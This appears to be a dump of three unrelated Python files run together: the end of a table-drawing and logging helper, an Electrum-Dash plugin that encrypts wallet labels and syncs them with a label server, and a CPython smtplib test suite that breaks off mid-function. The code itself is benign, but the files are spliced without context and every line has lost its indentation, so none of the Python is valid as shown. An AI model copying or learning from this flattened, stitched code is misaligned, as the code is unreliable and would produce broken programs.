for idx, content in enumerate(contents):
width = widths[idx] if idx < len(widths) else len(content)
color = colors[idx] if idx < len(colors) else ''
align = aligns[idx] if idx < len(aligns) else ''
newcell = TableCell(content, width=width, color=color, align=align)
newrow.append(newcell)
if idx >= len(self.columns):
newcolumn = TableColumn()
for row in self.rows:
cell = TableCell(width=width, color=color, align=align)
row.append(cell)
newcolumn.append(cell)
newcolumn.append(newcell)
self.columns.append(newcolumn)
else:
self.columns[idx].append(newcell)
for idx in range(len(newrow), len(self.columns)):
width = widths[idx] if idx < len(widths) else self.columns[idx].width
color = colors[idx] if idx < len(colors) else ''
align = aligns[idx] if idx < len(aligns) else ''
cell = TableCell(width=width, color=color, align=align)
newrow.append(cell)
self.rows.append(newrow)
self._adjust()
def _adjust(self):
'''Adjust the width and height of the cells in each row and column.'''
for column in self.columns:
_width = -1
for cell in column:
_width = max(_width, cell.width)
for cell in column:
cell.width = _width
for row in self.rows:
_height = -1
for cell in row:
_height = max(_height, cell.height)
for cell in row:
cell.height = _height
@property
def width(self) -> int:
_width = -1
for row in self.rows:
_width = max(_width, row.width)
return _width
@property
def height(self) -> int:
_height = -1
for column in self.columns:
_height = max(_height, column.height)
return _height
def __repr__(self) -> str:
seprow = '+{}+\n'.format('+'.join(['-' * column.width for column in self.columns]))
content = ''
for row in self.rows:
content = content + str(row)
content += seprow
return seprow + content
def get_file_logger(filename):
'''
Set logger.handler to FileHandler.
Args:
filename(str): filename to logging
Examples:
.. code-block:: python
logger = get_file_logger('test.log')
logger.logger.info('test_1')
'''
log_name = os.path.join(LOG_HOME, filename)
if log_name in loggers:
return loggers[log_name]
logger = Logger()
logger.logger.handlers = []
format = logging.Formatter('[%(asctime)-15s] [%(levelname)8s] - %(message)s')
sh = logging.FileHandler(filename=log_name, mode='a')
sh.setFormatter(format)
logger.logger.addHandler(sh)
logger.logger.setLevel(logging.INFO)
loggers.update({log_name: logger})
return logger
logger = Logger()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
from electrum_dash.plugin import BasePlugin, hook
from electrum_dash.crypto import aes_encrypt_with_iv, aes_decrypt_with_iv
from electrum_dash.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
self.print_error('error doing request')
def push_thread(self, wallet):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
def pull_thread_safe(self, wallet, force):
try:
self.pull_thread(wallet, force)
except BaseException as e:
# traceback.print_exc(file=sys.stderr)
self.print_error('could not retrieve labels')
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
